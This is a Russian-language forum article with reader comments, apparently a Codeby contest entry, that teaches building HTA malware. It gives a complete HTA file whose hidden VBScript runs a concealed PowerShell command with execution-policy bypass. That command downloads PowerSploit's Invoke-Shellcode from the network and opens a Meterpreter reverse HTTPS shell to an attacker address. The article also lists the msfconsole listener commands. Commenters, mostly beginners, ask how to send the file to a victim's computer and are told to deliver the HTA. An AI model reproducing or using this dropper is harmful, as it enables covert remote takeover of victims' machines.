Статья Малварь на HTML или HTA для хакера

Конкурс

Статья для участия в конкурсе на Codeby. КЛИК!

{-- == ВВЕДЕНИЕ == --}

В этой статье будет рассказано о разработке вредоносных приложений на HTML. Но возникает вопрос, а зачем это вообще нужно? Существует очень много ситуаций, когда такая малварь может пригодиться. И чаще всего, эти ситуации прикладные. Например, социально-технический вектор. Расширение .hta не вызывает особых подозрений, а значит может быть использовано в данном случае.

{-- == ОСНОВНАЯ ЧАСТЬ == --}

Кто-то из вас скажет, что HTML не является языком программирования и будет прав, но в Windows существует возможность безбраузерного взаимодействия с документами HTML. Эта технология носит название HTA (HTML Application).
Эти приложения имеют расширения ".hta" и возможность их создания вышла уже в марте 1999 года. Так как HTA поддерживает исполнение сценариев, они могут использоваться для выполнения вредоносного кода.

Прочитать об этой технологии вы можете здесь:

Ссылка на статью в Wikipedia

Ссылка скрыта от гостей

Запуск HTA приложений происходит с помощью прикладной программы mshta.exe, которая использует недокументированную функцию RunHTMLApplication для их запуска. По умолчанию файлам с расширением .hta для запуска присвоена программа mshta.exe, поэтому для запуска HTA файлов достаточно сохранить их с нужным расширением. Давайте рассмотрим, как именно происходит разработка HTML Application приложений.

Для начала, создадим файл с расширением .hta и сохраним его на диске.

Любопытный факт. Если запустить файл теперь, то особого прока это нам не принесёт, однако файл уже находится в рабочем состоянии.

В каждой программе, в каждом языке программирования есть определённый скелет, с которым необходимо работать. У HTA он такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="Имя приложения"
    BORDER="Вид оформления окна. Варианты: thin/dialog/none/thick."
    BORDERSTYLE="Стиль рамки окна. Варианты: complex, normal, raised, static, sunken"
    CAPTION="Наличие загаловка у окна. Варианты: yes/no"
    maximizeButton="Наличие кнопки «Восстановить». Варианты: yes/no"
    minimizeButton="наличие кнопки «свернуть». Варианты: yes/no"
    ICON="Путь к значку окна в формате ICO (32x32)"
    SHOWINTASKBAR="Отображение документа в панели задач Windows. Варианты: yes/no"
    SINGLEINSTANCE="Можно ли открывать документы с тем же APPLIcATIONNAME? Варианты: yes/no"
    SYSMENU="Наличие системного меню и кнопок управления окном в заголовке окна. Варианты: yes/no"
    VERSION="Версия HTA. Я обычно ставлю 1.0"
    WINDOWSTATE="Исходный размер окна. Варианты: normal, minimize, maximize."/>
</head>

<body>
   Тело документа.
</body>

</html>

Как я уже сказал выше в HTA можно добавлять скрипты, как VBScript или JavaScript. Добавляется он также как и в обычные страницы. Кстати, аргументы с которым было запущено приложение можно получить с помощью атрибута commandLine элемента HTA:APPLICATION. Вот пример небольшого HTA приложения.

<html>
  <head>
    <title>HTA Test</title>
      <HTA:APPLICATION
       APPLICATIONNAME="Codeby"
       SCROLL="yes"
       SINGLEINSTANCE="yes"
       WINDOWSTATE="maximize"
      />
  </head>


  <body>
   <script language="VBScript">
       Msgbox "Hello, Codeby.NET!"
   </script>
  </body>
</html>

Сохраним и запустим это и мы получим примерно следующий результат.

Как вы можете увидеть, скрипт был успешно запущен и отработан. Мы познакомились с основами технологии HTML Application. Теперь, можно перейти к самой теме статьи.

Давайте создадим приложения для получения сессии в Meterpreter. Нам нужно исключить появление окна, поэтому скелет, с которым мы будем работать будет такой:

<html>
<head>
  <HTA:APPLICATION ID="oHTA"
    APPLICATIONNAME="MSession"
    BORDER="none"
    SHOWINTASKBAR="no"
    SINGLEINSTANCE="no"
    SYSMENU="no"
    VERSION="1.0"
    WINDOWSTATE="minimize"
   />
</head>
<body>
</body>
</html>

Теперь, добавим запуск вредоносной Powershell команды через VBScript. Сначала, подготовим PowerShell команду.

1. Не будем показывать окно командной строки, отключим использование профиля powershell, отключим использование интерактивного режима и разрешим запуск сторонних скриптов. Этого можно достичь с помощью этих опций.

-w hidden -nop -noni -exec bypass

2. Подготовим вредоносный payload. Можно использовать эту нагрузку, которая предоставит нам meterpreter shell. Используем PowerSploit скрипт. Для этого скачаем его и запустим с нужными параметрами.

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

3. Соберём команду и она примет следующий вид:

powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

Теперь, вставим следующий VBScript в HTA файл.

Window.ReSizeTo 0,0
'Делаем окно невидимым, уменьшим его размер до минимального
Window.MoveTo -4000, -4000
'Выносим окно за пределы видимости
 
Set wsh = CreateObject("wscript.shell")
'Создаём объект для выполения команд
wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
'Выполняем команду
Window.Close
'Завершаем работу

После данной манипуляции HTA файл приобретает следующий вид:

<html>
  <head>
    <HTA:APPLICATION ID="oHTA"
      APPLICATIONNAME="MSession"
      BORDER="none"
      SHOWINTASKBAR="no"
      SINGLEINSTANCE="no"
      SYSMENU="no"
      VERSION="1.0"
      WINDOWSTATE="minimize"
     />
  </head>

  <body>
    <script language="VBScript">
      Window.ReSizeTo 0,0
      Window.MoveTo -4000, -4000
 
      Set wsh = CreateObject("wscript.shell")
      wsh.Run "powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force"
      Window.Close
    </script>
  </body>
</html>

Сохраните этот файл на диске.

Запустим Meterpreter Listener на ПК атакующего:

Вот последовательность команд для его запуска:

msfconsole -q
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 192.168.0.106
set LPORT 8007
run

, где вместо 192.168.0.106 и 8007 указываем IP атакующего и желаемый порт.


Теперь, запустив вредоносный HTA документ мы получим meterpreter сессию:

{-- == ЗАКЛЮЧЕНИЕ == --}

На скриншоте выше видно, что сессия открылась успешно и мы можем взаимодействовать с заражённым компьютером.

Ну, на этом всё. Спасибо за внимание.

 

[Demesem]

Тип, а как контактировать с заражённым компом? Я понимаю что немного туповат

 

[Pernat1y]

Тип, а как контактировать с заражённым компом? Я понимаю что немного туповат

В примере использовался meterpreter.

 

[Demesem]

-w hidden -nop -noni -exec bypass

куда это ввести?

 

[Pernat1y]

-w hidden -nop -noni -exec bypass

куда это ввести?

В консоль. Это аргументы для powershell.exe

 

[Demesem]

мне ошибку выдает

 

[Pernat1y]

мне ошибку выдает

Херово, чё

 

[MLNK]

@Demesem было бы неплохо получить скрин или лог с ошибкой. Конечно если ты хочешь чтобы тебе кто-то помог. Мысли читать пока что не умеем.

 

[Demesem]

@Demesem было бы неплохо получить скрин или лог с ошибкой. Конечно если ты хочешь чтобы тебе кто-то помог. Мысли читать пока что не умеем.

ок, теперь меня прост это не интересует, заебался 3ий день это писать

 

[ExoITJ]

Всем привет!
Столкнулся с проблемкой, решил повторить данный малварь (только постигаю азы, читаю "всякое" и пробую "всякое").
Так вот, делал все по инструкции, но в итоге ничего не вышло :с
Meterpreter не находит сессию (на Kali Linux), *.hta файл запускал на Windows 10 (Win.Defender отрубил).
На скрине скрин машины.

P.S. Делаю все на виртуалках VMWare. Машины между собой пингуются. Так же пробовал изменять настройки сети с Host-only, на NAT и обратно, эффект один и тот же (На скрине видно, где перезапускал metasploit, что менял настройки, в самом *.hta файле соответственно тоже менял).
P.S.S. А может дело в портах.. хотя это же локалка.

 

[Ludovic13]

У меня вопрос как запустить ехе файл если я вот умею их скачивать через hta? Вот я скачал , но как запустить его ?

У меня вопрос как запустить ехе файл если я вот умею их скачивать через hta? Вот я скачал , но как запустить его ?

P.s уже понял забыл про ; ))

 

[TRYTON]

У меня вопрос как запустить ехе файл если я вот умею их скачивать через hta? Вот я скачал , но как запустить его ?

ку, поделись способом скачать exe через hta, please)

 

[chiter228]

и да, не смейтесь я новичок по этому : куда это вставлять ?

-w hidden -nop -noni -exec bypass

IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

,
где вместо 192.168.0.106 и 8007 укажите IP и порт атакующего.

powershell -w hidden -nop -noni -exec bypass IEX(New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -payload windows/meterpreter/reverse_https -lhost 192.168.0.106 -lport 8007 -force

 

[Pernat1y]

и да, не смейтесь я новичок по этому : куда это вставлять ?

В консоль

 

[Tem Plays]

Я не понял, что кидать компу для, собственно, его заражения? HTA-шку, VBS-ку или обе вещи? И как я могу получить IP и порт?

 

[Pernat1y]

Я не понял, что кидать компу для, собственно, его заражения? HTA-шку, VBS-ку или обе вещи?

Бегло посмотрел - там один .hta на выходе получается. Где ты vbs нашел?

И как я могу получить IP и порт?

Не кажется, что ты изучение компа/сетей не с того начал?

 

[Tem Plays]

Бегло посмотрел - там один .hta на выходе получается. Где ты vbs нашел?



Не кажется, что ты изучение компа/сетей не с того начал?

Про .vbs - я почитал ответы и понял, что это в консоль надо вводить. А HTA-файл, то есть, кидать на комп для заражения?

 

[Pernat1y]

А HTA-файл, то есть, кидать на комп для заражения?

Да